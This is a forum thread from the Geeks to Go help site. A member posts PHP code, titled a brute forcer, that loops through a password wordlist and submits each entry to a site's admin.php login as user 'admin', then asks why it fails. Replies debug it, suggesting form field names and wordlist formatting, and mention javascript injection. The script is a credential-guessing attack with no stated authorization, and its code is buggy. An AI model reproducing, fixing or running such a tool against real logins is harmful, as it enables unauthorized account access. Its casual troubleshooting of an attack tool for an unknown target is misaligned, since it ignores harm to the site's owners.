Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

php Brute Forcer


  • Please log in to reply

#1
sweft

sweft

    Member

  • Member
  • PipPipPip
  • 123 posts
<html>
 <head>
  <title>PHP Test</title>
 </head>
 <body>
<p /> Testing the PHP code<p />
 <?php
  $fh = fopen("dic1.txt", "r");
  while(!feof($fh)) {
   $curl = curl_init();
   $pass = fgets($fh,1024);
   $data = fread($fh, filesize('dic1.txt'));

   curl_setopt($curl, CURLOPT_URL,"http://www.domain.com/admin.php");
   curl_setopt($curl, CURLOPT_POST, 1);
   curl_setopt($curl, CURLOPT_POSTFIELDS, "Uname=admin&Pword=$pass&Submit=True");

   curl_exec ($curl);
   curl_close ($curl);
   

  $result = eregi("Incorrect", $data);
   if ( $result == 0 ) {
	echo "$pass is the password!";
   break;
  fclose($fh);
  }
 }

?> 
 
<p /> Again!
 </body>
</html>

Ok, do there is the source.. but I know I want to do get the curl execution into a string then check that string for the invalid variable but I don't see why this is not working.. any help?
Thank You in Advanced!
  • 0

Advertisements


#2
sweft

sweft

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 123 posts
wow- because of what it is.. no replys..?
  • 0

#3
Spike

Spike

    nOoB

  • Member
  • PipPipPipPip
  • 1,355 posts

wow- because of what it is.. no replys..?

No if this was illegal a staff member would of closed this topic. I assume you want to make this to test vundribilites on your webpage.

I am not expert and .php but I know soon enough someone should come around and help you. So Please be patient the forums are bussy. Some users only come on during the weekend, and since this is a international site many people may still be sleeping.


curl_setopt($curl, CURLOPT_POSTFIELDS, "Uname=admin&Pword=$pass&Submit=True");

Like I said I dont know much bout .php but I got a basis. Looking at this line of code make sure they correct. for example the value name is "Pword" make sure it is, maybe it is something like "pswrd" or "pass", ect.... You can check your webpage source.

Other than that it looks good, Ima test it now just incase and I will let you know. And also I dont mean to correct you or anything but this method would not be "Brute Force" Its more like "dictionary" also make sure that the file it is reading from exists.

Cool :whistling: I will get back to you now now. :blink:
  • 0

#4
Spike

Spike

    nOoB

  • Member
  • PipPipPipPip
  • 1,355 posts
Looked at it agian. Tried testing it. But not luck. Maybe your site somehow blocks it out (Security Reasons) try making a test site with less security.

Also a few things that might be cause this:

Make sure the file name its reading the password from is correct.
In the .txt file make sure the format is correct.

NOT GOOD:
hong long song kong

GOOD:
hong
long
song
kong

Also make sure the form send is correct ("Uname=admin&Pword=$pass&Submit=True")

eg. instead of Uname, txt_user, ect.... the same with Pword.

I done a little test and it seems $pass is not geting picked up. Also I would recommend learning java then you can do some injection wich is way easier. This looks almost like java injection, works on the same principles.

Cool :whistling: Goodluck with your problem, sorry I couldnt help completely.

Edited by spike_hacker_inc, 04 April 2006 - 12:24 AM.

  • 0

#5
Thef0rce

Thef0rce

    Member

  • Member
  • PipPipPip
  • 380 posts
I think you mean javascript injection. Java is a completely different language lol.

javascript injection is good but php would be more reliable if you can get the code right lol. I'd look at it but I haven't done php in quite some time.
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP